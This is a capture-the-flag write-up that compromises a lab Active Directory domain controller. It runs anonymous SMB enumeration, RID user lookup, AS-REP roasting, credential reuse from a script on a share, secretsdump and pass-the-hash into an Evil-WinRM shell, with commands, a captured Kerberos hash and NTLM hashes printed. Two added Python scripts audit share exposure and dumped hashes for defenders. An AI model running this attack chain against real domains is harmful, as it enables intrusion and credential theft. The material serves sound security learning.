VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.
This is a much simpler machine, do not overthink. You can do it by following common methodologies.
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-22 18:48:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

The initial nmap results point at a Windows domain controller for vulnnet-rst.local (DNS, Kerberos, LDAP and SMB all listening). I'll start by enumerating the SMB shares.
smbmap -H 10.10.50.173 -u anonymous -p ""
[+] Guest session    IP: 10.10.50.173:445    Name: 10.10.50.173
        Disk                              Permissions     Comment
        ----                              -----------     -------
        ADMIN$                            NO ACCESS       Remote Admin
        C$                                NO ACCESS       Default share
        IPC$                              READ ONLY       Remote IPC
        NETLOGON                          NO ACCESS       Logon server share
        SYSVOL                            NO ACCESS       Logon server share
        VulnNet-Business-Anonymous        READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous      READ ONLY       VulnNet Enterprise Sharing

We have anonymous read access to two shares, so I'll download everything and look through it. The documents mention employee names, so we may be able to build usernames from them for a password spray. After creating a list of candidate logins from those names, we can use kerbrute to check which of them actually exist in the domain.
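As a defender-side check for the share listing above, here is an added example (my own code, not part of the original write-up and not part of smbmap) that parses the table smbmap prints and classifies what an unauthenticated session can reach. The sample input is the write-up's own output with whitespace normalised; the permission strings matched by the regex are the four smbmap prints.

```python
"""Classify what an unauthenticated SMB session can reach.

Added example, not part of the original write-up and not part of smbmap
itself. It parses the share table smbmap prints and separates the findings
a defender acts on: built-in shares exposed to guests, IPC$ open to
anonymous sessions, and custom shares readable or writable without
credentials.
"""
import re
from typing import List, NamedTuple, Tuple

# Sample input: the smbmap table from the write-up, whitespace normalised.
SMBMAP_OUTPUT = """\
[+] Guest session    IP: 10.10.50.173:445    Name: 10.10.50.173
        Disk                              Permissions     Comment
        ----                              -----------     -------
        ADMIN$                            NO ACCESS       Remote Admin
        C$                                NO ACCESS       Default share
        IPC$                              READ ONLY       Remote IPC
        NETLOGON                          NO ACCESS       Logon server share
        SYSVOL                            NO ACCESS       Logon server share
        VulnNet-Business-Anonymous        READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous      READ ONLY       VulnNet Enterprise Sharing
"""

# smbmap prints exactly one of these four permission strings per share;
# banner, header and dash lines do not match and are dropped.
ROW_RE = re.compile(r"^\s*(\S+)\s+(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(.*?)\s*$")
BUILTIN_SHARES = {"ADMIN$", "C$", "IPC$", "NETLOGON", "SYSVOL"}


class Share(NamedTuple):
    name: str
    perms: str
    comment: str


def parse_smbmap(text: str) -> List[Share]:
    """Keep only the table rows of the smbmap output."""
    return [Share(*m.groups()) for m in map(ROW_RE.match, text.splitlines()) if m]


def guest_exposure(shares: List[Share]) -> List[Tuple[str, str]]:
    """Return (share, reason) for everything the guest session can touch."""
    findings = []
    for s in shares:
        if s.perms == "NO ACCESS":
            continue
        if s.name == "IPC$":
            # Anonymous IPC$ is what later lets lookupsid.py enumerate domain users.
            findings.append((s.name, "anonymous IPC$ allows SID lookups, i.e. user enumeration"))
        elif s.name in BUILTIN_SHARES:
            findings.append((s.name, f"built-in share reachable by guest ({s.perms})"))
        elif "WRITE" in s.perms:
            findings.append((s.name, f"custom share writable without credentials ({s.perms})"))
        else:
            findings.append((s.name, "custom share readable without credentials"))
    return findings


if __name__ == "__main__":
    for name, reason in guest_exposure(parse_smbmap(SMBMAP_OUTPUT)):
        print(f"{name:30} {reason}")
```

Run against the sample it reports IPC$ and the two VulnNet-*-Anonymous shares. The fix on the server side is the share ACL (no Everyone or ANONYMOUS LOGON read on business data) together with the "Network access: Restrict anonymous access to Named Pipes and Shares" and "Network access: Do not allow anonymous enumeration of SAM accounts and shares" policies, which close the IPC$ path used in the next step.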
┌──(kali㉿kali)-[/opt]
└─$ ./kerbrute_linux_amd64 userenum -d vulnnet-rst.local --dc 10.10.50.173 ~/Desktop/thm/vuln_roasted/users

None of the guessed usernames were valid, so that list was a dead end. Back to the drawing board.

After a lot of Googling I came across an IppSec video about exposed IPC$ shares and the impacket tool lookupsid.py, which uses the anonymous session to enumerate domain users by SID.
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

Continuing with the impacket theme, I'll run GetNPUsers.py against the user list to look for accounts that do not require Kerberos pre-authentication (AS-REP roasting), and it turns out we can grab a hash for t-skid.

└─$ ./GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.50.173 -usersfile ~/Desktop/thm/vuln_roasted/users -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:905b58a5e24209b37ad61bf87f3f65f3$1832aa5cd8806cd7e1f225e27f3353e0965546503005f341be3b493711e8eeae8e372a86f701a80c2782cc1373dca8cdf44df8b8e595a0fbe88063ac9beef77c733105829b7f287f6b9ded207c1ca2de4b689b877ad11bec97c0d1351720297f6999ecebcb921a120862e742a40056401bce007292555f463dd90f962a93400bf9ecb650ad9730694ef5b4b0b5ac933d15c18bceaaf5fac96881e16830fe9e31d2a9c78722370c97b78aae74adfed02ffd553401472a40668a8f8c8427feb08f6738257985e8355d22f8705a790fe2a38b6672bf34a4e59462b54d25295a07b09402f265afdef30e872218d27d7bc585911d7dea2360
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
After cracking the t-skid hash offline, we can authenticate to SMB as t-skid and find a script named ResetPassword.vbs on one of the shares. It contains credentials for another user, a-whitehat, and checking them with crackmapexec shows they give us shell access, which we can take with Evil-WinRM.

crackmapexec smb 10.10.50.173 -u a-whitehat -p bNdKVkjv3RR9ht
SMB         10.10.50.173    445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB         10.10.50.173    445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\a-whitehat:bNdKVkjv3RR9ht (Pwn3d!)
We discover that a-whitehat is a domain admin, so since we're on an impacket roll, let's see what we can get from secretsdump…

./secretsdump.py VULNNET-RST.LOCAL/a-whitehat:bNdKVkjv3RR9ht@10.10.50.173
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)

We successfully dumped the NTLM hash of the local Administrator account, so we can use Evil-WinRM to pass the hash…
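The dump above is in the usual user:rid:lmhash:nthash::: form, and reviewing such output after an authorised assessment is where most of the remediation value is. This added example (my own, not from the write-up or impacket) parses that format and reports the three things worth fixing: accounts with an empty NT hash, accounts that still store an LM hash, and NT hashes shared by more than one account (same password). The sample mixes the write-up's three SAM lines with two constructed lines, backup-svc and legacy-app, added to exercise the reuse and LM checks.

```python
"""Audit a secretsdump-style hash dump for weak password hygiene.

Added example, not part of the original write-up or of impacket. Parses
user:rid:lmhash:nthash::: lines and flags empty passwords, LM storage
and password reuse between accounts.
"""
import re
from collections import defaultdict
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage is off, the healthy state
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": the account has an empty password

HASH_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Sample input: the write-up's SAM lines plus two constructed accounts.
# backup-svc deliberately shares Administrator's NT hash; legacy-app carries
# an LM hash (the well-known LM/NT pair for "password").
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
backup-svc:1002:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
legacy-app:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""


def parse_dump(text: str) -> List[Dict[str, object]]:
    """Return one dict per hash line; status lines ([*], [-]) are skipped."""
    entries = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["rid"] = int(entry["rid"])
            entries.append(entry)
    return entries


def audit(entries: List[Dict[str, object]]) -> Dict[str, object]:
    """Group the findings a defender should action from the dump."""
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for e in entries:
        by_nt[str(e["nt"])].append(str(e["user"]))
    return {
        # Empty NT hash: usually disabled built-ins, but any enabled account here is a logon with no password.
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        # A stored LM hash means the password is short enough and old enough to be LM-hashed: trivially crackable.
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        # Identical NT hashes are identical passwords; one crack or one pass-the-hash covers all of them.
        "reused": {nt: users for nt, users in by_nt.items() if len(users) > 1 and nt != EMPTY_NT},
    }


if __name__ == "__main__":
    for finding, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{finding}: {value}")
```

The reuse check is the one that matters for the next step: pass-the-hash works wherever the same NT hash is valid, so a local Administrator hash shared across hosts (the problem LAPS exists to remove) turns one dump into access everywhere.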
┌──(kali㉿kali)-[~/Desktop/thm/vuln_roasted]
└─$ evil-winrm -i 10.10.50.173 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
This was a fun room in Active Directory basics and a nice tour through the amazing tools in the impacket suite.